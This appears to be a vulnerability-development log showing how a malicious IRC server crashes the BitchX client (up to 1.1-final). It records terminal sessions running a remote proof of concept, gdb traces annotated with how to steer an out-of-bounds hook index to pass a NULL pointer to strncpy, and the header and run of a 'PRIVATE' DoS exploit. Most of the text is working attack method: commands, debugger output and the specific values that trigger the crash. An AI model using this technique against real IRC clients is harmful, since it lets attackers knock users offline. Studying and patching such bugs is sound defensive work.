nitrous@lsd:~/vulndev/biatch$ gcc poc-stacked.c -o poc-stacked poc-stacked.c: En la función ‘main’: poc-stacked.c:82: aviso: el puntero que apunta en el paso del argumento 3 de ‘accept’ difiere en signo nitrous@lsd:~/vulndev/biatch$ ./poc-stacked & [2] 7303 nitrous@lsd:~/vulndev/biatch$ BitchX (epic) =<1.1-final remote PoC ==================================== Listening on port 6667 nitrous@lsd:~/vulndev/biatch/BitchX/source$ gdb -q ./BitchX Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) r foo localhost Starting program: /home/nitrous/vulndev/biatch/BitchX/source/BitchX foo localhost BitchX - Based on EPIC Software Labs epic ircII (1998). Version (BitchX-1.1-final) -- Date (20040326). Process [7325] Using terminal type [xterm] , . ,$ . ,$' . . ,$' : ,g$p, . $, ,$' y&$ `"` .,. $&y `$, ,$' $$$ o oooy$$$yoo o $$$ `$, ,$' -acidjazz . $$$%yyyp, gyp`$$$'gyyyyyyp, $$$yyyyp, `$, ,$' . . yxxxx $$$"`"$$$ $$$ $$$ $y$"`"$$$ $$$"`"$$$ xxx`$,$'xxxxxxy . $ $$7 l$$ $$$ $$$ $$7 """ $$7 ly$ .$' $ $ $$b dy$ $$$ $y$ $$b $$$ $$b d$$ ,$`$, $ . $xxxx $$$uuu$$$ $$$ $$$ $$$uuu$$$ $$$ $$$ x ,$'x`$, xxxx$ . . """ """ """ """ """ ,$' `$, . b i t c h - x ,$' `$, $' `$, ' `$, `$, `$ ` -:- BitchX: Auto Response is set to - foo -:- Connecting to port 6667 of server localhost [refnum 0] [10:30am][] [] [Lag ??] [::::] [0] Program received signal SIGSEGV, Segmentation fault. 0x080c8cf4 in BX_do_hook (which=9999999, format=0x81749e8 "%s %s") at hook.c:865 865 if (hook_functions[which].mark && (gdb) bt #0 0x080c8cf4 in BX_do_hook (which=9999999, format=0x81749e8 "%s %s") at hook.c:865 #1 0x08109bcc in numbered_command (from=0xbfb43b38 'A' , comm=-9999999, ArgList=0xbfb43280) at numbers.c:1413 #2 0x081117f1 in parse_server (orig_line=0xbfb43b37 ":", 'A' ...) at parse.c:1912 #3 0x0811aa79 in do_server (rd=0xbfb44420, wr=0xbfb443a0) at server.c:584 #4 0x080d9a9a in BX_io (what=0x816f0b0 "main") at ./irc.c:1319 #5 0x080da458 in main (argc=3, argv=0xbfb44614, envp=0xbfb44624) at ./irc.c:1687 (gdb) p &hook_functions[0] $1 = (HookFunc *) 0x818aac0 (gdb) p which $2 = 9999999 (gdb) p &hook_functions[which] $3 = (HookFunc *) 0x14046cac (gdb) p hook_functions[which] Cannot access memory at address 0x14046cac (gdb) q <<<=================================================================>>> MY WORK: DoS BitchX! passing through some if statements and finally break strncpy() with a (char *) 0x00 pointer as source. <<<=================================================================>>> nitrous@lsd:~/vulndev/biatch/BitchX/source$ gdb -q ./BitchX Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) b numbered_command Breakpoint 1 at 0x8106583: file numbers.c, line 519. (gdb) r foo localhost Starting program: /home/nitrous/vulndev/biatch/BitchX/source/BitchX foo localhost BitchX - Based on EPIC Software Labs epic ircII (1998). Version (BitchX-1.1-final) -- Date (20040326). Process [7332] Using terminal type [xterm] , . ,$ . ,$' . . ,$' : ,g$p, . $, ,$' y&$ `"` .,. $&y `$, ,$' $$$ o oooy$$$yoo o $$$ `$, ,$' -acidjazz . $$$%yyyp, gyp`$$$'gyyyyyyp, $$$yyyyp, `$, ,$' . . yxxxx $$$"`"$$$ $$$ $$$ $y$"`"$$$ $$$"`"$$$ xxx`$,$'xxxxxxy . $ $$7 l$$ $$$ $$$ $$7 """ $$7 ly$ .$' $ $ $$b dy$ $$$ $y$ $$b $$$ $$b d$$ ,$`$, $ . $xxxx $$$uuu$$$ $$$ $$$ $$$uuu$$$ $$$ $$$ x ,$'x`$, xxxx$ . . """ """ """ """ """ ,$' `$, . b i t c h - x ,$' `$, $' `$, ' `$, `$, `$ ` -:- BitchX: Auto Response is set to - foo -:- Connecting to port 6667 of server localhost [refnum 0] [10:39am][] [] [Lag ??] [::::] [0] Breakpoint 1, numbered_command (from=0xbfe74c88 'A' , comm=-9999999, ArgList=0xbfe743cc) at numbers.c:519 519 char none_of_these = 0; (gdb) n 521 int old_current_numeric = current_numeric; (gdb) 522 AJoinList *tmp = NULL; (gdb) 525 if (!ArgList[1] || !from || !*from) (gdb) 528 user = (*ArgList[0]) ? ArgList[0] : NULL; (gdb) 530 reset_display_target(); (gdb) 532 ArgList++; (gdb) 533 current_numeric = -comm; /* must be negative of numeric! */ (gdb) 535 switch (comm) /*** AT THIS POINT, WHE CAN BYPASS THE switch() STATEMENT ***/ /*** AUTOMATICALLY TO DEFAULT (negative number). ***/ (gdb) p comm $1 = -9999999 (gdb) p current_numeric $2 = 9999999 (gdb) n /*** BEGINS THE 'default:' SECTION ***/ 1391 char *ArgSpace = NULL; (gdb) 1396 for (i = len = 0; ArgList[i]; len += strlen(ArgList[i++])) (gdb) 1398 len += (i - 1); (gdb) 1399 ArgSpace = alloca(len + 1); (gdb) 1400 ArgSpace[0] = '\0'; (gdb) 1403 if (ArgList[0] && is_channel(ArgList[0])) (gdb) 1406 for (i = 0; ArgList[i]; i++) (gdb) 1408 if (i) (gdb) 1410 strcat(ArgSpace, ArgList[i]); (gdb) 1406 for (i = 0; ArgList[i]; i++) (gdb) 1413 if (!do_hook(current_numeric, "%s %s", from, ArgSpace)) (gdb) b BX_do_hook Breakpoint 2 at 0x80c8c49: file hook.c, line 824. (gdb) n Breakpoint 2, BX_do_hook (which=9999999, format=0x81749e8 "%s %s") at hook.c:824 824 Hook *tmp = NULL, (gdb) n 825 *next = NULL, (gdb) 828 *name = NULL; (gdb) 829 int retval = DONT_SUPPRESS_DEFAULT; (gdb) 830 unsigned display = window_display; (gdb) 832 Hook *hook_array [2048] = { 0 }; (gdb) 833 int hook_num = 0; (gdb) 834 char *result = NULL; (gdb) 835 int old_debug_count = debug_count; /*** THIS IS A CHUNK OF THE CORRESPONDING C C0DE OF THE NEXT GDB... ***/ from hook.c: <...snip...> #define HF_NORECURSE 0x0001 <...snip...> /* Numeric list */ if (which < 0) { NumericList *hook; if ((hook = find_numeric_list(-which))) { name = hook->name; list = &hook->list; } else list = NULL; } /* Named list */ else { /* * If we're already executing the type, and we're * specifically not supposed to allow recursion, then * dont allow recursion. ;-) */ if (hook_functions[which].mark && (hook_functions[which].flags & HF_NORECURSE)) list = NULL; else { list = &(hook_functions[which].list); name = hook_functions[which].name; strncpy(hook_name, hook_functions[which].name, BIG_BUFFER_SIZE); } } <...snip...> /*** END OF RELATED C CODE ***/ (gdb) 844 if (which < 0) (gdb) p which $1 = 9999999 (gdb) n /*** 'else' SECTION ***/ 865 if (hook_functions[which].mark && (hook_functions[which].flags & HF_NORECURSE) /*** SO, WHE NEED TO BYPASS THIS if(), BUT WHE NEED TO CHANGE THE 'which' VALUE (9999999) AND ***/ /*** PASS THE '&' OPERATION WITH 'HF_NORECURSE', LET'S DO IT: ***/ (gdb) whatis hook_functions type = HookFunc [157] /*** IT HOLDS 157 HookFunc VARIABLES (0 - 156) ***/ (gdb) p hook_functions[0] $2 = {name = 0x816a8e2 "ACTION", list = 0x0, params = 3, mark = 0, flags = 0} (gdb) p hook_functions[156] $3 = {name = 0x816af75 "YELL", list = 0x0, params = 1, mark = 0, flags = 0} (gdb) p &hook_functions[156] $5 = (HookFunc *) 0x818b6f0 (gdb) p hook_functions[156].mark $6 = 0 (gdb) p hook_functions[156].flags $7 = 0 (gdb) p hook_functions[156].name $8 = 0x816af75 "YELL" (gdb) p &hook_functions[156] $9 = (HookFunc *) 0x818b6f0 (gdb) x/10s &hook_functions[158] 0x818b718 : "" 0x818b719 : "" 0x818b71a : "" 0x818b71b : "" 0x818b71c : "" 0x818b71d : "" 0x818b71e : "" 0x818b71f : "" 0x818b720 : "$Id: if.c,v 1.1.1.1 2003/04/11 01:09:07 dan Exp $" 0x818b752 : "" (gdb) x/s &hook_functions[159].name 0x818b72c : "1.1.1.1 2003/04/11 01:09:07 dan Exp $" (gdb) x/s &hook_functions[165].name 0x818b7a4 : " input.c,v 1.1.1.1 2003/04/11 01:09:07 dan Exp $" (gdb) x/s &hook_functions[171].name 0x818b81c : "\003" (gdb) x/s &hook_functions[185].name 0x818b934 : "BitchX" (gdb) x/s &hook_functions[261].name 0x818bf24 : ")" /*** SO, WHE CAN TAKE WHATEVER WE WANT FROM 0x818b6f0 TO ...ETC...ETC...ETC. BUT, REMEMBER, ***/ /*** WHE NEED TO PASS THE If() WITH 'hook_funcions[which].flag & 1' AND THEN, JUST GIVE ***/ /*** AND INVALID POINTER TO strncpy() (hook_functions[which].name). HEY, BUT REMEMBER THAT ***/ /*** THE LAST ONE MEMBER OF 'hook_functions' ARRAY IS NULL ;)... ***/ (gdb) p hook_functions[157] $12 = {name = 0x0, list = 0x0, params = 0, mark = 0, flags = 0} (gdb) whatis hook_functions[157].name type = char * (gdb) set which=157 (gdb) n /*** COOL, 'if()' PASSED. THIS IS THE 'else' PART ***/ 870 list = &(hook_functions[which].list); (gdb) n 871 name = hook_functions[which].name; (gdb) n 872 strncpy(hook_name, hook_functions[which].name, BIG_BUFFER_SIZE); (gdb) x/x &hook_functions[which].name 0x818b704 : 0x00000000 (gdb) whatis hook_name type = char [2049] (gdb) n Program received signal SIGSEGV, Segmentation fault. 0xb7e2f410 in strncpy () from /lib/tls/i686/cmov/libc.so.6 (gdb) bt #0 0xb7ea4410 in strncpy () from /lib/tls/i686/cmov/libc.so.6 #1 0x080c8d78 in BX_do_hook (which=157, format=0x81749e8 "%s %s") at hook.c:872 #2 0x08109bcc in numbered_command (from=0xbfce9c68 "FOOBAR", comm=-157, ArgList=0xbfce93b0) at numbers.c:1413 #3 0x081117f1 in parse_server (orig_line=0xbfce9c67 ":FOOBAR") at parse.c:1912 #4 0x0811aa79 in do_server (rd=0xbfcea550, wr=0xbfcea4d0) at server.c:584 #5 0x080d9a9a in BX_io (what=0x816f0b0 "main") at ./irc.c:1319 #6 0x080da458 in main (argc=3, argv=0xbfcea744, envp=0xbfcea754) at ./irc.c:1687 (gdb) x/i $eip 0xb7e2f410 : movzbl (%ecx),%eax (gdb) i r eax ecx eax 0x81a0360 135922528 ecx 0x0 0 /*** NULL POINTER ***/ (gdb) q The program is running. Exit anyway? (y or n) y nitrous@lsd:~/vulndev/biatch$ head -12 biatch-xxx.c /* ** PRIVATE ****** PRIVATE ******* PRIVATE ******* PRIVATE * * * * BitchX =< 1.1-final DoS (SIGSEGV) [Integer overflow] * * [strncpy() approach] * * nitr0us * * * ** PRIVATE ****** PRIVATE ******* PRIVATE ******* PRIVATE * * * Special Tnx to Federico L. Bossi (pelotudo de m!3%d@) * * Read biatch-x.log for details. nitrous@lsd:~/vulndev/biatch$ ./biatch-xxx ################################################### ### BitchX =< 1.1-final DoS ### ### [ strncpy() approach] ### ###------=] PRIVATE - PRIVATE - PRIVATE - [=-----## ###### nitr0us ###### Client @ 127.0.0.1 Sent 22 bytes ..... nitrous@lsd:~/vulndev/biatch/BitchX/source$ bitchx BitchX - Based on EPIC Software Labs epic ircII (1998). Version (BitchX-1.1-final) -- Date (20040326). Process [7366] Using terminal type [xterm] ________ ________ ________ ________ \ //___________\ /________\\ /_________\_ // ___\ ___ _________ __ _______ \ / / <<_____ \ / > \ /____\ >> \ ___ ____ /______\_____<<_____//___________>> /_______\ /_____>>sm <<___________ bitchx by panasync /______\\ ____ /------------------------------------------------\\ -:- BitchX: Auto Response is set to - nitrous -:- Connecting to port 6667 of server localhost [refnum 1] [11:17am][] [] [0] /server localhost 6667 [Lag ??] [::::] [0] Violación de segmento $